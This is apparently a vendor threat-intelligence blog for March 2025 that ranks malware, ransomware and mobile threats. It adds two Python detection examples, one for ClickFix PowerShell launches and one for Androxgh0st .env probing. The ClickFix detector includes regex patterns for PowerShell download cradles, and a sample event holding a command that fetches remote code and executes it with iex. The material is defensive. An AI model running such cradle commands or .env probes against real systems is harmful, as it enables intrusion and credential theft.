Our latest Global Threat Index for March 2025 shows the continued dominance of FakeUpdates, a downloader malware that remains the most prevalent cyber threat worldwide. This sustained threat comes as RansomHub ransomware campaigns gain traction, marking a growing concern in the ransomware space. Meanwhile, education remains the most impacted industry globally, with both malware and ransomware attacks increasingly targeting this sector.

This month, researchers uncovered a new intrusion campaign that delivers FakeUpdates and leads to RansomHub ransomware attacks. A notable trend in March is an attack chain that combines compromised websites, rogue Keitaro TDS instances, and fake browser update lures to trick users into downloading the FakeUpdates malware. The obfuscated JavaScript loader enables data exfiltration, command execution, and persistent access for further exploitation. These findings underscore the evolving tactics cyber criminals employ, with legitimate platforms such as Dropbox and TryCloudflare increasingly abused to evade detection and maintain persistence.

Meanwhile, researchers uncovered a massive Lumma Stealer phishing campaign, compromising over 1,150 organizations and 7,000 users across North America, Southern Europe, and Asia. Attackers distributed nearly 5,000 malicious PDFs hosted on Webflow’s CDN, using fake CAPTCHA images to trigger PowerShell execution and deploy malware. This growing trend of exploiting legitimate platforms to distribute malware reflects a shift in cyber criminal tactics aimed at evading detection. Additionally, researchers linked Lumma Stealer to fake Roblox games and a trojanized pirated Windows Total Commander tool promoted via hijacked YouTube accounts.
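The fake-CAPTCHA lure described above ends with the victim running an attacker-supplied PowerShell command (the ClickFix pattern also mentioned for Lumma in the malware list). The following is an added example, not Check Point's code: a Python heuristic over process-creation events with Sysmon-style field names (Image, ParentImage, CommandLine, User) that flags PowerShell launched from explorer.exe, as happens when a user pastes a command into the Run dialog, with a command line that resembles a download cradle. The parent-process assumption, the command-line indicators, and the sample events are all constructed for this example.

```python
"""Heuristic detection of ClickFix-style PowerShell launches.

Added example (not Check Point's code). It scans process-creation events whose
field names follow Sysmon Event ID 1 (Image, ParentImage, CommandLine, User)
and flags PowerShell started from the Windows shell with a command line that
looks like a pasted download cradle. The parent-process and command-line
heuristics are this example's own assumptions; the events are constructed.
"""
import ntpath
import re

# PowerShell hosts we care about.
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Parents that indicate a user launched the command by hand (Run dialog or
# desktop shell) rather than a scheduled task or deployment tool. Assumption.
USER_SHELL_PARENTS = {"explorer.exe"}

# Command-line traits typical of pasted cradles (heuristic, not exhaustive).
CRADLE_PATTERNS = [
    ("hidden window", re.compile(r"-(?:w|win|window|windowstyle)\s+hidden", re.I)),
    ("encoded command", re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("download cradle", re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b", re.I)),
    ("in-memory execution", re.compile(r"\biex\b|invoke-expression", re.I)),
    ("mshta launch", re.compile(r"\bmshta(?:\.exe)?\b", re.I)),
]


def classify_event(event: dict) -> list:
    """Return the list of matched indicators, empty if the event is benign."""
    image = ntpath.basename(event.get("Image", "")).lower()
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    if image not in POWERSHELL_IMAGES or parent not in USER_SHELL_PARENTS:
        return []
    cmd = event.get("CommandLine", "")
    return [name for name, rx in CRADLE_PATTERNS if rx.search(cmd)]


def find_clickfix(events: list) -> list:
    """Return one finding per suspicious event with the user and indicators."""
    findings = []
    for ev in events:
        reasons = classify_event(ev)
        if reasons:
            findings.append({
                "User": ev.get("User", "?"),
                "CommandLine": ev.get("CommandLine", ""),
                "Indicators": reasons,
                # Two or more independent traits is a strong signal. Assumption.
                "Severity": "high" if len(reasons) >= 2 else "medium",
            })
    return findings


# Constructed sample events for this example.
SAMPLE_EVENTS = [
    {  # User pasted a lure command into Win+R: hidden window, download, iex.
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": 'powershell -w hidden -c "iwr https://example.invalid/v.txt | iex"',
        "User": r"CORP\alice",
    },
    {  # Deployment tool running a signed script: different parent, not flagged.
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Program Files\Admin\deploy.exe",
        "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1",
        "User": r"CORP\svc-deploy",
    },
    {  # User opened an interactive PowerShell from the Start menu: no cradle.
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell.exe",
        "User": r"CORP\bob",
    },
    {  # Unrelated process.
        "Image": r"C:\Windows\System32\notepad.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "notepad.exe notes.txt",
        "User": r"CORP\bob",
    },
]

if __name__ == "__main__":
    for f in find_clickfix(SAMPLE_EVENTS):
        print(f"[{f['Severity']}] {f['User']}: {', '.join(f['Indicators'])}")
        print("   ", f["CommandLine"])
```

Run as a script it prints the single flagged event. In practice the input would be Sysmon Event ID 1 records or Windows 4688 events (4688 needs command-line auditing enabled). The explorer.exe parent is only one way to spot a hand-pasted command; tune the parent set and the indicator patterns to what is normal in your environment, and treat a match as a prompt to pull the user's browser history for the lure page.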

Top malware families

*The arrows relate to the change in rank compared to the previous month.

FakeUpdates is the most prevalent malware this month, impacting 8% of organizations worldwide, followed by Remcos and AgentTesla, both with an impact of 3%.

  1. FakeUpdates – Fakeupdates (AKA SocGholish) is a downloader malware that was initially discovered in 2018. It is spread through drive-by downloads on compromised or malicious websites, prompting users to install a fake browser update. Fakeupdates malware is associated with the Russian hacking group Evil Corp and is used to deliver various secondary payloads after the initial infection.
  2. Remcos – Remcos is a Remote Access Trojan (RAT) first observed in 2016, often distributed through malicious documents in phishing campaigns. It is designed to bypass Windows security mechanisms, such as UAC, and execute malware with elevated privileges, making it a versatile tool for threat actors.
  3. AgentTesla – AgentTesla is an advanced RAT (remote access Trojan) that functions as a keylogger and password stealer. Active since 2014, AgentTesla can monitor and collect the victim’s keyboard input and system clipboard, and can record screenshots and exfiltrate credentials entered for a variety of software installed on the victim’s machine (including Google Chrome, Mozilla Firefox and Microsoft Outlook email client). AgentTesla is openly sold as a legitimate RAT with customers paying $15 – $69 for user licenses.
  4. AsyncRAT – AsyncRAT is a remote access Trojan (RAT) targeting Windows systems, first identified in 2019. It exfiltrates system information to a command-and-control server and executes commands such as downloading plugins, terminating processes, capturing screenshots, and updating itself. Commonly distributed via phishing campaigns, it is used for data theft and system compromise.
  5. Androxgh0st – AndroxGh0st is a Python-based malware that targets applications using the Laravel PHP framework by scanning for exposed .env files containing sensitive information such as login credentials for services like AWS, Twilio, Office 365, and SendGrid. It operates by utilizing a botnet to identify websites running Laravel and extracting confidential data. Once access is gained, attackers can deploy additional malware, establish backdoor connections, and exploit cloud resources for activities like cryptocurrency mining.
  6. Formbook – Formbook, first identified in 2016, is an infostealer malware that primarily targets Windows systems. The malware harvests credentials from various web browsers, collects screenshots, monitors and logs keystrokes, and can download and execute additional payloads. The malware spreads via phishing campaigns, malicious email attachments, and compromised websites, often disguised as legitimate files.
  7. Phorpiex – Phorpiex, also known as Trik, is a botnet that has been active since at least 2010, primarily targeting Windows systems. At its peak, Phorpiex controlled more than a million infected hosts. Phorpiex is notorious for distributing other malware families, including ransomware and cryptominers, via spam campaigns, and has been involved in large-scale sextortion campaigns.
  8. Lumma – Lumma Stealer, first detected in August 2022, is a malware-as-a-service (MaaS) information stealer that exfiltrates sensitive data from infected Windows systems, including credentials, cryptocurrency wallets, and browser information. It spreads through phishing campaigns, malicious websites, and social engineering tactics like the ClickFix method, where users are tricked into executing attacker-provided PowerShell commands.
  9. Rilide – Rilide is a malicious browser extension targeting Chromium-based browsers like Chrome, Edge, Brave, and Opera. Disguised as a legitimate Google Drive extension, it enables threat actors to monitor browsing history, take screenshots, and inject malicious scripts to withdraw funds from cryptocurrency exchanges. Notably, Rilide can simulate dialogs to trick users into disclosing two-factor authentication (2FA) details, facilitating unauthorized cryptocurrency transactions. Its distribution methods include malicious Microsoft Publisher files and deceptive Google Ads promoting fake software installers.
  10. Mirai – Mirai is a malware strain that transforms networked devices running Linux, particularly Internet of Things (IoT) devices like IP cameras and home routers, into remotely controlled bots forming a botnet. First identified in August 2016, Mirai gained notoriety for orchestrating some of the largest distributed denial-of-service (DDoS) attacks recorded, including those against the website of security journalist Brian Krebs and the DNS provider Dyn. The malware propagates by scanning the internet for IoT devices still configured with default factory login credentials, exploiting these to gain control. Following the public release of its source code in October 2016, numerous variants have emerged.
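Androxgh0st (item 5 above) works by probing web servers for .env files left reachable under the document root. As an added example that is not Check Point's code, the Python script below parses access-log lines in the combined format used by Apache and nginx, counts .env requests per client, and separates probes the server blocked from ones it answered with 200, which means the secrets file was actually served. The log lines, the client addresses and the .env-variant pattern are constructed for this example.

```python
"""Spotting Androxgh0st-style probes for exposed .env files in web access logs.

Added example (not Check Point's code). It parses access-log lines in the
combined format used by Apache and nginx, counts requests for .env files (and
variants such as .env.bak) per client, and separates probes that were blocked
from ones the server answered with 200, which means the secrets file was
served. The log lines below are constructed for this example.
"""
import re
from collections import Counter
from typing import Optional

# Client, timestamp, request line and status from a combined-format entry.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# A path whose final component is .env or a variant like .env.bak / .env.prod.
ENV_PATH = re.compile(r"(?:^|/)\.env(?:\.[\w-]+)*$", re.I)


def parse_line(line: str) -> Optional[dict]:
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    fields = m.groupdict()
    fields["path"] = fields["path"].split("?", 1)[0]  # drop any query string
    fields["status"] = int(fields["status"])
    return fields


def analyze(lines) -> dict:
    """Summarise .env probing: attempts per client and any successful reads."""
    probes = Counter()   # client -> number of .env requests
    exposed = []         # distinct (client, path) pairs answered with 200
    for line in lines:
        rec = parse_line(line)
        if rec is None or not ENV_PATH.search(rec["path"]):
            continue
        probes[rec["ip"]] += 1
        pair = (rec["ip"], rec["path"])
        if rec["status"] == 200 and pair not in exposed:
            exposed.append(pair)
    return {"probes": probes, "exposed": exposed}


# Constructed sample log: one scanner tries several variants and one succeeds.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2025:10:14:01 +0000] "GET /.env HTTP/1.1" 200 412 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2025:10:14:02 +0000] "GET /.env.bak HTTP/1.1" 404 153 "-" "Mozilla/5.0"
198.51.100.23 - - [12/Mar/2025:10:14:05 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2025:10:14:09 +0000] "POST /.env HTTP/1.1" 200 412 "-" "python-requests/2.31"
192.0.2.45 - - [12/Mar/2025:10:20:31 +0000] "GET /api/.env?x=1 HTTP/1.1" 403 0 "-" "curl/8.0"
198.51.100.23 - - [12/Mar/2025:10:21:00 +0000] "GET /environment.html HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    report = analyze(SAMPLE_LOG.splitlines())
    for ip, n in report["probes"].most_common():
        print(f"{ip}: {n} .env request(s)")
    for ip, path in report["exposed"]:
        print(f"EXPOSED: {path} served with 200 to {ip}; rotate the secrets it holds")
```

A 403 or 404 on these paths tells you someone is scanning; a 200 on .env means the credentials it holds (AWS, Twilio, Office 365, SendGrid and similar, as the item notes) should be treated as compromised and rotated, and the file should be moved outside the document root or denied at the web server.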

Top Ransomware Groups

The data is based on insights from ransomware “shame sites”. RansomHub is the most prevalent ransomware group this month, responsible for 12% of the published attacks, followed by Qilin and Akira, both with an impact of 6%.

  1. RansomHub – RansomHub is a ransomware-as-a-service (RaaS) operation that emerged as a rebranded version of the previously known Knight ransomware. Surfacing prominently in early 2024 in underground cyber crime forums, RansomHub has quickly gained notoriety for its aggressive campaigns targeting various systems including Windows, macOS, Linux, and particularly VMware ESXi environments. This malware is known for employing sophisticated encryption methods.
  2. Qilin – Qilin, also referred to as Agenda, is a ransomware-as-a-service criminal operation that collaborates with affiliates to encrypt and exfiltrate data from compromised organizations, subsequently demanding a ransom. This ransomware variant was first detected in July 2022 and is developed in Golang. Agenda is known for targeting large enterprises and high-value organizations, with a particular focus on the healthcare and education sectors. Qilin typically infiltrates victims via phishing emails containing malicious links to establish access to their networks and exfiltrate sensitive information. Once inside, Qilin usually moves laterally through the victim’s infrastructure, seeking critical data to encrypt.
  3. Akira – Akira Ransomware, first reported at the beginning of 2023, targets both Windows and Linux systems. It uses symmetric encryption with CryptGenRandom() and ChaCha 2008 for file encryption and is similar to the leaked Conti v2 ransomware. Akira is distributed through various means, including infected email attachments and exploits in VPN endpoints. Upon infection, it encrypts data and appends a “.akira” extension to file names, then presents a ransom note demanding payment for decryption.

Top Mobile Malwares

This month Anubis is the most prevalent mobile malware, followed by Necro and AhMyth.

  1. ↔ Anubis – Anubis is a versatile banking trojan that originated on Android devices and has evolved to include advanced capabilities such as bypassing multi-factor authentication (MFA) by intercepting SMS-based one-time passwords (OTPs), keylogging, audio recording, and ransomware functions. It is often distributed through malicious apps on the Google Play Store and has become one of the most prevalent mobile malware families. Additionally, Anubis includes remote access trojan (RAT) features, enabling extensive surveillance and control over infected systems.
  2. ↔ Necro – Necro is a malicious Android downloader that retrieves and executes harmful components on infected devices based on commands from its creators. It has been discovered in several popular apps on Google Play, as well as in modified versions of apps such as Spotify, WhatsApp, and Minecraft distributed on unofficial platforms. Necro is capable of downloading dangerous modules to smartphones, enabling actions such as displaying and clicking on invisible ads, downloading executable files, and installing third-party apps. It can also open hidden windows to run JavaScript, potentially subscribing users to unwanted paid services. Furthermore, Necro can reroute internet traffic through compromised devices, turning them into part of a proxy botnet for cyber criminals.
  3. ↔ AhMyth – AhMyth is a remote access trojan (RAT) targeting Android devices, typically disguised as legitimate apps like screen recorders, games, or cryptocurrency tools. Once installed, it gains extensive permissions to persist after reboot and exfiltrate sensitive information such as banking credentials, cryptocurrency wallet details, multi-factor authentication (MFA) codes, and passwords. AhMyth also enables keylogging, screen capture, camera and microphone access, and SMS interception, making it a versatile tool for data theft and other malicious activities.

Top-Attacked Industries Globally

This month education is the most attacked industry globally, followed by telecommunications and government.

  1. Education
  2. Telecommunications
  3. Government

Threat Index per country

The map below displays the risk index globally (darker red = higher risk), demonstrating the main risk areas around the world.

Check Point’s Global Threat Impact Index and its ThreatCloud Map are powered by Check Point’s Threat Cloud AI intelligence. ThreatCloud provides real-time threat intelligence derived from hundreds of millions of sensors worldwide over networks, endpoints, and mobiles. The intelligence is enriched with AI-based engines and exclusive research data from Check Point Research, the intelligence and research arm of Check Point.

Conclusion

Check Point’s Threat Emulation and Harmony Endpoint offer robust protection against a wide range of attack methods, file types, and operating systems, including the malware families and attack types discussed in this blog. Threat Emulation analyzes files to detect malicious activity before it can infiltrate a user’s network, effectively revealing unknown threats and zero-day vulnerabilities. When used alongside Harmony Endpoint, which conducts real-time file analysis, Threat Emulation evaluates each file, allowing users to quickly access a secure version while the original file undergoes a thorough examination. This proactive approach not only enhances security by providing rapid access to safe content but also systematically identifies and addresses potential threats, thereby preserving the network’s integrity.
